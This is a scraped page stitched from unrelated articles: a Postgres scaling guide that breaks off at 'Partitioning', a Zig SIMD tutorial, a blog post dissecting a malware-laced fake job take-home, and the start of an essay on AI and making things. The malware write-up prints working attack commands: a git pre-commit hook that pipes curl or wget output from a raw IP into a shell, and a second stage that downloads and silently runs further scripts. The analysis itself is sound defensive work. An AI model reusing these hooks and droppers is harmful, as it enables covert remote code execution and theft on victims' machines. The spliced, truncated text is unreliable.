And if Claude is writing all of your queries, this might be a waste of time! I recommend supabase/agent-skills
A quick note on ORMs
This guide should still be useful, but you might need to translate some of these tips into your ORM of choice. Lots of optimizations as you scale just aren’t possible with ORMs unless you can break past the abstraction layer and write SQL. You can do this gracefully or non-gracefully; Prisma TypedSQL or equivalents look interesting for this. We use sqlc at Hatchet which gets us very similar behavior; highly recommend if you’re a Go stack.
Table of contents
The simple stuff: good reads, writes and schemas
Writing a good schema Writing good read queries Writing performant joins Compound indexes and aligning ORDER BY to your indexes Writing good write queries Migrations Connection management
Writing a good schema
Writing good read queries
Writing performant joins
Compound indexes and aligning ORDER BY to your indexes
Writing good write queries
Migrations
Connection management
Intermediate: the query planner, bulk updates, and autovacuum
Introducing the leakiest of abstractions, the query planner Sometimes it just makes sense to seq scan Writing lots of data Default autovacuum settings can kill your database Other types of bloat
Introducing the leakiest of abstractions, the query planner
Sometimes it just makes sense to seq scan
Writing lots of data
Default autovacuum settings can kill your database
Other types of bloat
Some advanced stuff
FOR UPDATE SKIP LOCKED Partitioning Tricks for large table migrations
FOR UPDATE SKIP LOCKED
Partitioning
Tricks for large table migrations
The simple stuff: good reads, writes and schemas
Let’s start with the basics: queries and schemas at low volume.
Writing a good schema
After you’re deployed, schemas are by far the hardest to change moving forward, so it’s worth spending some time on them. I’d recommend building your schema iteratively: start with a rough approximation for your tables and primary keys, then write some queries on those tables based on your application needs. You can approximate this with some questions: Is this a high-read and/or high-write table? What are the most common filters on reads? Which columns am I updating the most?
If you want to be more formal about it, you can look into database normalization into 1NF/2NF/3NF, but I’ve found normal forms to sometimes be at odds with query efficiency and ease of use, which is critical when you’re moving fast—sometimes it’s just easier to dump data into a jsonb column.
My rules of thumb for schemas are:
Use identity columns (auto-incrementing integers, slightly more performant than bigserial) or built-in UUIDs for primary keys
Always use timestamptz
Always use primary keys
Use foreign keys with cascading deletes for low-volume tables, particularly where database consistency and correctness are important. Careful at higher volume.
Writing good read queries
Let’s start with SELECT queries. A useful—albeit slightly inaccurate—mental model for fast selects is: under the hood, Postgres is either going to find a single row in a table very quickly, or it’s going to read every single row in your table using something called a sequential scan 😞.
It’s going to find a single row very quickly when you filter by:
An explicit index
A unique constraint (just a special case of index)
A primary key (these are automatically indexed in Postgres)
Indexes by default use a btree implementation. It’s most helpful to think of indexes as just another table in Postgres, with data stored in a specific format which is optimized for lookups (more on this later). These trees are great because finding a single row happens in approximately log(n) time, where n is the number of rows in the table—in other words, really fast.
When Postgres can’t use an index, it’ll use something called a sequential scan, or seq scan. Seq scans are much slower than index lookups, but modern databases are so fast at loading rows into memory that you probably won’t even notice at first: seq scans on tables with less than 20k rows are pretty much instant.
Writing performant joins
For inner joins, there’s rarely an argument for not using primary keys as the inner join; it usually speaks to a schema design or normalization problem. Treat ON clauses with the same respect as a WHERE clause—the same principles apply. Use an index.
Compound indexes and aligning ORDER BY to your indexes
Often the first slow query in your application will be a list query across a large table. Something like:
Loading syntax highlighting…
In this case, you can use a compound index—a sensible one might be:
Loading syntax highlighting…
In more complex cases, a good rule of thumb is: the ORDER BY columns should be the last columns in the index, and you should align columns to the ordering in the ORDER BY. Note that Postgres can scan btrees in both directions, so sometimes the DESC is irrelevant—but for compound indexes it’s good practice. More information here.
Writing good write queries
The premise of successful writes is:
Keep transactions short. Don’t go querying an external service in the middle of a transaction unless you have a really good reason to.
Be careful of the rows you’re locking for writing; in other words, only lock what you need. Every time you update a row, you’re taking out a lock on that row for a short period of time until the transaction commits.
As your system gets busier, you’re going to start noticing the impact of locks more. In particular, you might try to create an index at some point in the future with a simple CREATE INDEX command: turns out this locks your table and prevents inserts and updates! When creating an index on an existing large table, always use CREATE INDEX CONCURRENTLY.
Migrations
Getting really good at writing migrations is an important technical advantage: it helps you iterate much faster and increases your uptime. As a starting point, try to keep migrations additive (in other words, don’t delete or remove columns) and run them in a transaction wherever possible; this will make rollbacks and partial migrations much easier to deal with. As you get more advanced, you can start looking into expand and contract migrations.
The simplest mental model for good migrations is: does this block all of my writes, or does it not? Creating an index without CONCURRENTLY blocks all your writes, so you might see downtime. Generally, operations which call ALTER TABLE should be worth a second look; for example, adding a new check constraint to a very large table can block your writes as well (unless you add it with the NOT VALID keyword).
Connection management
Every time you execute a transaction or query against your database, you’re utilizing a connection. Connections are expensive in a number of dimensions (cpu and memory), and high connection churn can lead to a lot of unnecessary resource waste, so connections should be long-lived. Connection storms (when you start using up a ton of new connections at the same time) can also lead to very hard to debug edge cases related to internal Postgres locks.
Because of all these connection footguns, external connection poolers like pgbouncer are great! If you can’t add this for whatever reason, in-memory connection poolers are a great second option. For example, because Hatchet is open-source, we don’t assume that all user databases use connection poolers, so we use pgxpool (an in-memory connection pool for Go) for this purpose.
Intermediate: the query planner, bulk updates, and autovacuum
Introducing the leakiest of abstractions, the query planner
At a certain point, your queries might become complex enough that a simple index won’t cut it (and you shouldn’t endlessly add indexes to your tables—they come with overhead). The queries might involve many JOIN statements or different types of joins where the correct path for querying the data isn’t clear.
At this point, you will need to concern yourself with the query planner. At best, the query planner is a leaky abstraction. It’s an internal implementation, and you have virtually no control over it, but you have to know its spontaneous and sometimes irrational behavior. It’s like working with an LLM!
The query planner looks at the query you pass in, and it figures out how it should translate your query into a set of internal operations in the database. For example, it might look at your query, and realize that it needs to use an index. In an ideal world, the query planner would know, for every query and set of parameters, the perfect plan to use. But the query planner is operating on limited information, and sometimes it doesn’t pick the best option.
This limited information is the table statistics. You can actually query it directly in Postgres:
Loading syntax highlighting…
These statistics are collected for every ANALYZE. This also happens when autovacuum is run (see below), so more frequent autovacuums also mean that your query statistics will be more up to date. A common reason why your query is behaving improperly is not analyzing frequently enough.
The reason I think it’s useful to view queries as binary—they either seq scan or they don’t seq scan—is: the more you micro-optimize a query, the more of a risk you take that the query planner goes rogue. If you stick to querying by primary keys and indexes, the query planner will have a much easier time.
Let’s say that there’s nothing obviously wrong in your query, but it’s still slow—how do you go about debugging this? Some Postgres database providers (like Google CloudSQL) will sample your queries and save slow ones—but many don’t. This is where EXPLAIN ANALYZE is your friend. This outputs the query plan for the query and executes the query (careful running this in production—you can use EXPLAIN without ANALYZE to get a query plan), and then compares its estimates based on the table statistics to the actual number of rows scanned. I usually place my sql query in a file, prefix it with EXPLAIN (ANALYZE, COSTS, VERBOSE, BUFFERS, FORMAT JSON) and run:
Loading syntax highlighting…
And then use explain.dalibo.com to visualize the execution plan.
Sometimes it just makes sense to seq scan
There are cases where you think an index should be used, but the query planner is still seq scanning anyway, despite table statistics being up to date and the index being valid. In these cases, Postgres is usually estimating that the cost of the seq scan will be smaller than the cost of the index scan. Index scans do come with some overhead; indexes are stored separately from the actual data in the table (called the heap)—finding all of the rows in the heap can be expensive!
Unless you can dramatically restructure your query, you might have to accept that it’s going to seq scan, or think about something like partitioning (more on that below).
Writing lots of data
Let’s say your application is scaling and you need to write a lot of data fast. Each query has some overhead associated with it (separate from the connection overhead we talked about before): this includes the round-trip time to the database, the time it takes the internal application connection pool to acquire a connection, and the time it takes Postgres to process the query (including a set of internal Postgres locks which can be bottlenecks in high-throughput scenarios).
To reduce this overhead, we can pack a batch of rows into each query. The simplest way to do this is to send all queries to the Postgres server at once in an implicit transaction (in Go, we can use pgx to execute a SendBatch). Batching is very powerful: we found that it can ~10× your throughput. I wrote more about this plus some other tips for writing data quickly here.
Default autovacuum settings can kill your database
Autovacuum is a critical operation in Postgres databases that sometimes needs to be tuned, especially in high-write scenarios. The autovacuum daemon is responsible for a number of things, including cleaning up dead tuples and managing transaction ids.
What’s a dead tuple? A tuple is an instance of a row on the filesystem. Every time you update or delete a row, a version of that row is left in Postgres until all transactions which started before that row was updated or deleted have committed or rolled back. These rows which can no longer be read by any transactions are dead tuples.
If you’re writing data quickly enough, sometimes autovacuum can’t keep up, which will get you into a very unhealthy state, very quickly. You’ll see this when you query for active processes on the database:
Loading syntax highlighting…
If you see an autovacuum query running for more than ~1 hour, you might want to consider changing your autovacuum settings! See this article for more information.
It’s worth monitoring this: if you use up all transaction ids in the system before they can be reclaimed by autovacuum, you’ll reach a dreaded state called transaction id wraparound. This will mean a big chunk of downtime.
Other types of bloat
Besides dead tuples, there are two other kinds of bloat you’ll often encounter in a busy Postgres system:
Table bloat caused by partially filled pages. Postgres stores rows on pages on disk, each of which are 8kb in size. When Postgres can’t fit new rows onto an existing page, it creates a new one. But when dead tuples are reclaimed, this can lead to pages not being entirely filled, which can increase the disk usage of Postgres, sometimes significantly. The best way to avoid table bloat is by tuning autovacuum before you’re bloated. But there are some extensions to help with bloated tables, like pg_repack, because the built-in Postgres VACUUM FULL is rarely a good idea. Note that Postgres 19 is getting REPACK…CONCURRENTLY, which I haven’t tested, but seems like potentially a good solution for concurrent table repacking.
Index bloat is a special case of table bloat, and is similarly solved by good autovacuum settings. But Postgres has a built-in command for dealing with this, which is REINDEX INDEX CONCURRENTLY.
Some advanced stuff
I wanted to end with a set of advanced Postgres features which have been particularly useful for us at Hatchet.
FOR UPDATE SKIP LOCKED
The best way to think about this Postgres feature is that it reserves the rows that you’re selecting for use in your transaction without interfering with other queries. We use it primarily for implementing our job queue; a single-query queue in Postgres can be implemented like this:
Loading syntax highlighting…
It’s also very useful in cases where you’re doing many independent updates of rows, or you’re managing leases on objects in your system across many instances of your application (for example, we use this to distribute tenant leases across Hatchet engines).
Partitioning
SIMD has a reputation for being complex. I’ve met many very good software engineers who dismiss it as something too complex to learn or a niche optimization meant for only the highest-performance software, not useful in everyday programming.
I think that’s wrong. SIMD can be simple to understand1, and common “process N values at a time” SIMD code to speed up a naive for loop almost always follows the same general shape. Once you learn the basics, writing SIMD is just about as easy as a for loop. And when it’s not, it’s usually a good sign to skip it for now.
Every developer should know at least that much SIMD.
This post uses Zig for examples but is a general piece that applies to any programming language. Support for SIMD instructions varies by programming language and I hope that more programming languages expose these generic concepts in the future!
I hate that I have to do this for every post now, but I also want to note this was completely hand-written with no AI assistance.
Background: What Is SIMD?
The Common Shape
A Real Example
Step 1: Broadcast Constants
Step 2: Loop One Vector at a Time
Step 3: Perform the SIMD Operation
Step 4: Reduce the Vector Result
Step 5: Finish with the Scalar Tail
Recap: The Common Shape
Why Can’t the Compiler Do This?
Everyone Should Know SIMD
Background: What Is SIMD?
If you already know what SIMD is, skip this section.
SIMD allows a CPU to operate on multiple values in parallel. For example, instead of comparing one byte at a time, a CPU can compare 4, 8, or even more bytes with a single instruction.
If you ever see loops like this in your code:
for (byte in bytes) { /* … */ } for (character in string) { /* … */ } for (value in array) { /* … */ }
There is an opportunity to use SIMD. SIMD turns those into this:
for (8 byte chunk in bytes) { /* … */ }
This results in a localized speedup that directly maps to the parallelism: you process data 4x, 8x, or even faster.
The only real requirement for this to pay off is that you need to be regularly processing a large enough number of bytes. If you’re doing these for loops across data that is only ever a handful or dozens of bytes, it’s not worth it. But if this is iterating over hundreds, thousands, millions of bytes, the payoff will be huge.
That’s the basics. Projects such as simdutf and simdjson take this to an extreme and use SIMD techniques that can be difficult to understand. But you do not need to write algorithms like those to benefit from SIMD. The common case is dramatically simpler.
The Common Shape
The common “process N values at a time” SIMD code follows the same five steps:
Broadcast any constants you need and initialize vector accumulators, if any.
Loop over input one vector-width chunk at a time.
Perform the comparison or arithmetic across all lanes in parallel.
Reduce or store the vector result as needed.
Handle the remaining elements with a scalar tail. A scalar tail is just your normal loop from before vectorizing, but it only processes the remainder that doesn’t fit into a full vector.
As you do this more and more, you’ll begin to naturally decompose every for loop into these five steps and writing SIMD becomes nearly as natural as writing a scalar loop.
A Real Example
Let’s look at a real example from Ghostty. We’ll look at the scalar implementation, the SIMD implementation, and then map it back to the common shape above.
I have a slice of decoded codepoints that I want to consume until I see a value at or below 0xF (a C0 control character).2 Terminals are mostly plain characters to be printed, so we try to batch all those together. So this loop finds the end of the next printable run as quickly as possible.
The scalar loop is one line:
while (end < cps.len and cps[end] > 0xF) end += 1;
It processes one codepoint at a time. It is easy to understand.
Here is the generic vector version with no CPU-specific intrinsics3 and no comments. I will explain it in detail later.
if (simd.lanes(u32)) |lanes| { const V = @Vector(lanes, u32); const threshold: V = @splat(0xF); while (end + lanes <= cps.len) : (end += lanes) { const values: V = cps[end..][0..lanes].*; const greater_than_threshold = values > threshold; if (@reduce(.And, greater_than_threshold)) continue; const mask: std.meta.Int(.unsigned, lanes) = @bitCast(greater_than_threshold); end += @ctz(~mask); break; } }
while (end < cps.len and cps[end] > 0xF) end += 1;
12 more lines of code.
This can improve the loop’s throughput by up to 4x with ARM NEON (including Apple Silicon), 8x with AVX2 (most modern x86 CPUs), and 16x with AVX-512 (some Intel CPUs and AMD Zen 4 and newer).
In real-world end-to-end throughput from terminal program to finalized terminal state on an AVX2 Intel desktop, this was more like a 5x speedup. You always lose some of the ideal speedup due to the other stuff around the SIMD code, but… that’s still 5x!
Okay, now I understand that those 12 lines are going to look really alien to someone not familiar with the concepts. So now let’s back up and explain it step by step, mapping it directly to the shape previously mentioned.
Step 1: Broadcast Constants
Let’s start with the first three lines:
if (simd.lanes(u32)) |lanes| { const V = @Vector(lanes, u32); const threshold: V = @splat(0xF);
simd.lanes(u32) is a helper in Ghostty that returns the number of u32 values the target CPU can process at once. These individual values are called lanes. On ARM this returns 4, AVX2 returns 8, and AVX-512 returns 16. If the target doesn’t have a vector size we want to use, it returns null and we skip all of this code and do zero SIMD work.
@Vector(lanes, u32) creates the vector type. If lanes is 8, then V is a single value containing eight u32 values that the CPU can operate on in parallel. And so on.
Finally, we need to compare every value to 0xF. A vector comparison requires a vector on both sides, so @splat(0xF) copies, or broadcasts, 0xF into every lane. The result is a vector that looks like this:
{ 0xF, 0xF, 0xF, 0xF, 0xF, 0xF, 0xF, 0xF }
This is step 1: prepare the vector type and broadcast any constants. Some algorithms also initialize a vector accumulator here, but this algorithm doesn’t need one.
Step 2: Loop One Vector at a Time
Next, we loop over one complete vector at a time:
while (end + lanes <= cps.len) : (end += lanes) { const values: V = cps[end..][0..lanes].*;
If lanes is 8, we only enter the loop when at least eight values remain. Inside the loop, we load those eight values into the vector values. At the end of every loop, end += lanes moves forward by eight values instead of one.
The requirement for a complete vector is important. If only five values remain, we can’t load an eight-lane vector. There are various tricks to handle this, but we do the easy thing and handle them via our scalar tail, which I’ll explain later in step 5.
This is step 2: load and loop over the input one vector-width chunk at a time. You can see the lane-count speedup here!
Step 3: Perform the SIMD Operation
Now we perform the comparison:
const greater_than_threshold = values > threshold;
Both values and threshold are vectors, so this maps to a vector operation (a literal vector CPU instruction). The one > compares every lane in values to every corresponding lane in threshold. If there are eight lanes, this is equivalent to performing the scalar comparison cps[end] > 0xF eight times, but it does it in one CPU instruction instead.4
The result is another vector with one boolean per lane. Conceptually, it looks something like this:
values: { 0x41, 0x42, 0x43, 0x0A, 0x44, 0x45, 0x46, 0x47 } threshold: { 0xF, 0xF, 0xF, 0xF, 0xF, 0xF, 0xF, 0xF } greater_than_threshold: { true, true, true, false, true, true, true, true }
This is the actual SIMD operation. There is no explicit inner loop. The > operator applies to every lane in parallel.
Comparisons are only one example. This could be addition, multiplication, minimum, maximum, or any other operation supported by the vector type. The point is the code still has the same shape.
Step 4: Reduce the Vector Result
We now have a vector of booleans, but the original loop needs to know the location of the first value at or below 0xF.
First, let’s handle the common case where every value is above 0xF:
if (@reduce(.And, greater_than_threshold)) continue;
@reduce(.And, …) combines every boolean using and and returns a single boolean. If every lane is true, we continue and process the next vector. In our example, lane 3 is false, so @reduce returns false and we fall through to find exactly which lane failed.
If any lane is false, then we need to find exactly which lane failed:
const mask: std.meta.Int(.unsigned, lanes) = @bitCast(greater_than_threshold); end += @ctz(~mask); break;
@bitCast turns the vector of booleans into an integer with one bit per lane. A 1 bit means the value was greater than 0xF and a 0 means it wasn’t. We invert the mask so failed comparisons are 1, and then @ctz counts the number of zero bits before the first failure. That count is the index of the first failing lane.
We add that index to end and break because we found the control character.
Using the same values from step 3, we can see this transformation per lane:
values: { 0x41, 0x42, 0x43, 0x0A, 0x44, 0x45, 0x46, 0x47 } greater_than_threshold: { true, true, true, false, true, true, true, true } mask: { 1, 1, 1, 0, 1, 1, 1, 1 } ~mask: { 0, 0, 0, 1, 0, 0, 0, 0 }
@ctz(~mask) counts three zero bits before the first 1, so it returns 3. Adding 3 to end points it at lane 3, which contains 0x0A, the first control character.
This is step 4: reduce the vector result into whatever the original algorithm needs. This is also the step that varies the most between algorithms. A sum might reduce a vector accumulator into a single number. A transform might store the entire vector to an output buffer. Our scan turns the vector into a bit mask so it can find one specific lane.
Step 5: Finish with the Scalar Tail
After the vector loop, we run the exact scalar loop we started with:
while (end < cps.len and cps[end] > 0xF) end += 1;
If the input length isn’t an exact multiple of the vector width, this processes the remaining values. For example, an eight-lane vector loop leaves anywhere from zero to seven values for this loop. This is called the scalar tail.
This loop also handles CPUs where simd.lanes(u32) returns null. In that case we skip all of the SIMD code and the scalar loop processes the entire input. The original implementation remains both the fallback and the tail.
That’s step 5. It’s just the normal loop.
Recap: The Common Shape
Let’s map the entire implementation back to the five steps:
@splat(0xF) broadcasts the comparison value into every lane.
The while loop loads lanes values at a time.
values > threshold compares every lane in parallel.
@reduce, @bitCast, and @ctz find the first failed comparison.
The original scalar loop handles the remainder and unsupported CPUs.
The details in step 4 initially take some time to understand, but the overall shape is straightforward. And steps 1, 2, 3, and 5 tend to look nearly identical across completely different algorithms.
Whenever you see a for (byte in bytes), this is the shape you’ll map to.
Why Can’t the Compiler Do This?
Sometimes it can! Compilers can auto-vectorize simple loops, particularly regular arithmetic loops without complex control flow. You should always compile the scalar version with optimizations and see what your compiler produces before manually writing SIMD.
But compilers are severely limited in what they can auto-vectorize and are in general very poor at it. Auto-vectorization has been an active area of compiler research for decades, and recent research still begins from the observation that production compilers regularly miss vectorization opportunities. This isn’t a problem I expect to disappear soon.
Discuss on Hacker News or LinkedIn.
A recruiter slid into my LinkedIn DMs last Thursday with a Python developer role. I was thrilled that someone had reached out directly, so I asked for more details. When he shared the role description, company name, and the estimated pay, I figured I had nothing to lose.
Here is the initial message:
Offering $10,000-$15,000 a month for a remote-first, contract-to-hire role is just too good. Also, why is this guy revealing pay info before even we met? I thought recruiters play the “you first, me next” game. Rookie mistake.
Red flags immediately started waving. Why the huge budget? (Well, huge by Indian standards for a remote role; not exactly outrageous by US standards, but good enough to raise an eyebrow.) I looked up the company and saw it was a Y Combinator startup. YC companies aren’t exactly known for conventional operations, so it wasn’t completely outside the realm of possibility. Still, if a company has that kind of cash to throw around, they usually have a much more structured hiring pipeline. I decided to proceed, but kept my guard up.
I sent over my resume. The recruiter quickly approved it and handed over a take-home assignment via a Google Drive link containing a zip archive and a PDF with instructions. Here’s the original drive link: https://drive.google.com/drive/folders/18i1KDFXAPv7lqfBGddxj7IOnDy8J6VeH?usp=drive_link. I made my copy here in case they delete theirs: https://drive.google.com/drive/folders/1DZYWezjpwolsxXnM5F04_Ng3nzTRYpVS?usp=sharing.
Assessment PDF was surpringly legitimate looking. It’s about how to improve the existing codebase, architectural suggestions, some git operations etc..
I extracted the zip. At first glance, it was just a boilerplate FastAPI backend using SQLAlchemy; pretty standard stuff. I checked requirements.txt for any obvious typosquatting or malicious packages, but it was completely clean. For a brief second, I thought my suspicions were unfounded and this was a legitimate opportunity.
This is just a habit (may be from doing CTFs), whenever I get a random project folder, I just run tree -a to see what’s lurking in the hidden directories. But this might be the first time it paid off in the real world.
❯ tree -a . . ├── alembic.ini ├── for learning │ ├── dtos.py │ ├── main.py │ └── mockData.py ├── .git │ ├── config │ ├── description │ ├── gk │ │ └── config │ ├── HEAD │ ├── hooks │ │ ├── applypatch-msg │ │ ├── commit-msg │ │ ├── fsmonitor-watchman │ │ ├── post-applypatch │ │ ├── post-checkout │ │ ├── post-commit │ │ ├── post-merge │ │ ├── post-receive │ │ ├── post-rewrite │ │ ├── post-update │ │ ├── pre-applypatch │ │ ├── pre-auto-gc │ │ ├── pre-commit │ │ ├── pre-merge-commit │ │ ├── prepare-commit-msg │ │ ├── pre-push │ │ ├── pre-rebase │ │ ├── pre-receive │ │ ├── proc-receive │ │ ├── push-to-checkout │ │ ├── sendemail-validate │ │ └── update │ ├── index │ ├── info │ │ └── exclude │ ├── logs …
Wait a minute. A ton of Git hooks were pre-configured in the repository. I opened the pre-commit script to see what they were trying to run.
❯ cat .git/hooks/pre-commit #!/bin/sh
case “$(uname -s)” in Darwin*) curl -sL ’http://45.61.164.38:5777/task/mac?id=402′ -L | sh > /dev/null 2>&1 & ;; Linux*) wget -qO- ’http://45.61.164.38:5777/task/linux?id=402′ -L | sh > /dev/null 2>&1 & ;; MINGW*|MSYS*|CYGWIN*) curl -sL http://45.61.164.38:5777/task/windows?id=402 -L | cmd > /dev/null 2>&1 & ;; *) curl -sL ’http://45.61.164.38:5777/task/mac?id=402′ -L | sh > /dev/null 2>&1 & ;; esac
Bingo. They embedded a script that checks the victim’s host operating system and silently executes a remote payload.
Side note: Why use a raw IP address? If anything, this screams “malware.” At least register a decoy domain like lint-checker.com or jenkins-ci-runner.net. If the threat actors who wrote this are reading: take notes people!
Side note: Why use a raw IP address? If anything, this screams “malware.” At least register a decoy domain like lint-checker.com or jenkins-ci-runner.net. If the threat actors who wrote this are reading: take notes people!
Let’s see what the Linux payload actually does. Notice the id=402 parameter being passed to the endpoint. Keep that in mind.
❯ curl http://45.61.164.38:5777/task/linux?id=402 #!/bin/bash set -e echo “Authenticated” TARGET_DIR=“$HOME/Documents” clear wget -q -O “$TARGET_DIR/tokenlinux.npl” “http://45.61.164.38:5777/task/tokenlinux?id=402” clear mv “$TARGET_DIR/tokenlinux.npl” “$TARGET_DIR/tokenlinux.sh” clear chmod +x “$TARGET_DIR/tokenlinux.sh” clear nohup bash “$TARGET_DIR/tokenlinux.sh” > /dev/null 2>&1 & clear exit 0
The script pulls down a secondary payload initially named tokenlinux.npl (we’ll circle back to that specific extension later). It then hides the file in my ~/Documents directory as tokenlinux.sh, makes it executable, and fires it off in the background using nohup.
From Google: The nohup command (short for “no hang up”) is a Linux/Unix utility that keeps a process running even after you log out, close the terminal, or disconnect from an SSH session.
From Google: The nohup command (short for “no hang up”) is a Linux/Unix utility that keeps a process running even after you log out, close the terminal, or disconnect from an SSH session.
Down the rabbit hole we go. Let’s inspect this next script.
❯ curl http://45.61.164.38:5777/task/tokenlinux?id=402 … … BASE_URL=“http://45.61.164.38:5777” …
# Step 8: Download files
# Check if curl is available
if ! command -v curl >/dev/null 2>&1; then # If curl is not available, use wget wget -q -O “$USER_HOME/parser.js” “$BASE_URL/task/parser?id=402″ wget -q -O “$USER_HOME/package.json” “$BASE_URL/task/json” else # If curl is available, use curl curl -s -L -o “$USER_HOME/parser.js” “$BASE_URL/task/parser?id=402″ curl -s -L -o “$USER_HOME/package.json” “$BASE_URL/task/json” fi
# Step 9: Install ‘request’ package
cd “$USER_HOME” if [ ! -d “node_modules/request” ]; then npm install –silent –no-progress –loglevel=error –fund=false fi
# Step 10: Run token parser
if [ -f “$USER_HOME/parser.js” ]; then nohup node “$USER_HOME/parser.js” > “$USER_HOME/parser.log” 2>&1 & else exit 1 fi exit 0
I’ve trimmed the output to the most interesting bits for brevity, but full file is available here: tokenlinux.txt (bash script).
I’ve trimmed the output to the most interesting bits for brevity, but full file is available here: tokenlinux.txt (bash script).
This second stage does a lot of heavy lifting. It quietly installs Node.js, configures the system path, downloads a package.json and a parser.js file, installs the required dependencies, and runs the parser invisibly.
I took a look at parser.js. The code was heavily obfuscated, a complete mess to read manually. Remember the id parameter? I tried changing it in my request and received a completely different script back. The attackers are likely assigning unique identifiers to track individual candidates, serving customized payloads to each victim.
Since parser.js was a brick wall, I pivoted to package.json. Unlike the parser, this has to be standard JSON for npm to process it.
Btw, I’ve hosted parser.js here: parser.js
❯ curl http://45.61.164.38:5777/task/json
{ “name”: “tokendapp”, “version”: “1.0.0″, “devDependencies”: { “hardhat”: “^2.20.2” }, “dependencies”: { “axios”: “^1.12.2″, “basic-ftp”: “^5.0.5″, “child_process”: “^1.0.2″, “clipboardy”: “^4.0.0″, “crypto”: “^1.0.1″, “execp”: “^0.0.1″, “fs”: “^0.0.1-security”, “jsonwebtoken”: “^9.0.2″, “process”: “^0.11.10″, “ps-node”: “^0.1.6″, “request”: “^2.88.2″ }, “scripts”: { “test”: “npx hardhat test”, “deploy”: “npx hardhat run scripts/deploy.js” } }
These dependencies are incredibly suspicious. Why would a background setup task need clipboard access (clipboardy), and they need file system access (fs) too. And what exactly is hardhat?
Ah, an Ethereum development environment. This makes the tracking ID parameter even more curious. If they were dropping a Bitcoin miner, distributing specific hashing tasks to unique IDs would make sense. But Ethereum shifted away from Proof of Work; it doesn’t rely on mining anymore. They are likely using Hardhat to locate and drain crypto wallets or interact with local browser extensions? idk.
Hoping to deobfuscate parser.js, I threw the code into a few LLMs to see if they could untangle it.
Claude took one look at the file and triggered its safety rails, refusing to analyze the script:
Gemini, on the other hand, was more than happy to break it down (No, I’m not biased towards Google here. Well, okay, I am a Googler, but you can judge for yourself.):
Earlier, we saw the payload originally named tokenlinux.npl. A quick search confirms exactly what kind of threat actor uses that extension:
The Scam goes deeper
After realizing this was a widespread campaign, I did a bit more digging and found that people are getting different variations of this attack. Some folks received a zip file containing a .vscode folder. Inside, the attackers hid commands configured to run as soon as the directory is opened in VSCode (launch commands).
Pretty clever.
You don’t even have to run a git command, just opening this directory in VSCode is enough to get infected.
Also, it’s pretty evident now that this has nothing to do with Zavopay. The attackers just used whatever company name they found to make the offer look legitimate. Out of curiosity, I ran git log to inspect the project’s commit history, wondering if they left any custom traces. It turns out, they just cloned a random public repository.
❯ git log commit 16a25d9eaef7ef2e831a21ca0d703fe0fa621492 (HEAD -> main, origin/main, origin/feature/payment, origin/HEAD, feature/payment) Author: rhonda <womenofinspiration2016@gmail.com> Date: Mon Jun 29 22:04:17 2026 – 0400
add requirements
commit 8ae96928302a8e0757f2c72f85c46d801c97b91e Merge: f64c289 d6cb1f2 Author: Bharati Gogoi <bgogoi055@gmail.com> Date: Mon Jun 29 21:23:43 2026 +0530
Merge pull request #10 from Bgogoi123/feature/balance
[feat][Service for Adjusting Balance]
commit d6cb1f2f14b5d561e3611653327477e6a60eee95 Author: Bharati Gogoi <bharatigogoi@Bharatis-MacBook-Air.local> Date: Mon Jun 29 21:20:13 2026 +0530
[feat][Service for Adjusting Balance] - Added a service for adjustinh a user’s balance. - Removed old/commented codes.
commit f64c2898bbe2d4b5773f39e1022e95a2418fa0b4 Merge: 17aaa4c 9e0dbdf Author: Bharati Gogoi <bgogoi055@gmail.com> Date: Fri Jun 26 23:51:38 2026 +0530
Merge pull request #9 from Bgogoi123/feature/balance
[fix][Dependencies Annotated]
commit 9e0dbdf112124a25237018a3b92af10c51c54b5f Author: Bharati Gogoi <bharatigogoi@Bharatis-MacBook-Air.local> Date: Fri Jun 26 23:48:53 2026 +0530
[fix][Dependencies Annotated] - Annotated all dependencies in the router files of each module.
A quick search led me straight to the original repo: https://github.com/Bgogoi123/personal-finance-service. They literally just took someone’s innocent FastAPI project and slapped a malicious hidden directory on top of it.
Naturally, the next move was pivoting from defense to offense. I wanted to see if the attackers left any vulnerable services exposed on their IP.
An Nmap scan revealed three open ports. Two of them were unresponsive to version detection. Port 22 was running OpenSSH 9.6p1 on Ubuntu. Since that version was released just over a week prior to this scan, there were no known CVEs I could leverage to poke around their infrastructure.
So, they had decent OPSEC on their server, even if their malware deployment was a bit loud. That’s where the trail goes cold for now. Stay safe out there, and always check those hidden directories before running someone else’s code.
Now I understand why their assignment PDF has git tasks. They want to make sure that the candidate runs at least one of the git commands, so the hooks will get triggered.
Oh by the way, The “recruiter” seemed to have deleted the account, right after I called their front out.
That’s it for now. Feel free to connect with me on LinkedIn if you want to chat, though maybe skip sending any malware-laced take-home tests. (Actually, on second thought, if you have interesting malware samples, send ’em over!)
Thanks for reading!
2026 – 03-12
I made this!
TLDR: I gain a lot of fulfillment by making things. I don’t consider things built by others at my request to be made by me, and are therefore much less fulfilling. And then I feel sad. This article starts strong and then heads off into the weeds.
There have been a lot of pieces written about what I’ll call “the AI dev schism” And I think there’s a lot of truth to those:
Loss of the craft, coding things by hand
Loss of low-level problem-solving
Loss of fun
Gain of high-level problem-solving
Getting through back-burnered projects
Gain of fun
We’ll just grant those as being correct for various developers. But there’s something else that troubles me.
Backstory before we get going, so you can get a better idea of my perspective:
I’m a Gen-X hacker; I cut my teeth 80s microcomputer era.
I hold a BS and MS in CS.
I have 20 years industry experience, (Hewlett-Packard, startups, cofounder, Activision, etc.).
CS instructor for the last 9 years, now at Oregon State University-Cascades.
I’m 65% Doom on the AI-Utopia/Doom scale.
I’m a Claude Code user sometimes.
I code by hand sometimes.
My father taught philosophy at a community college for 35 years. This might help explain the latter part of this blog entry.
I’m going to use “AI” to mean “Generative AI and LLMs” in this essay. Sorry, veterans of so many AI winters.
Interlude!
Before we begin, I’d like to share with you a bit of my latest sci-fi novel. Some of you might unaware that, in addition to Beej’s Guides, I also write science fiction.
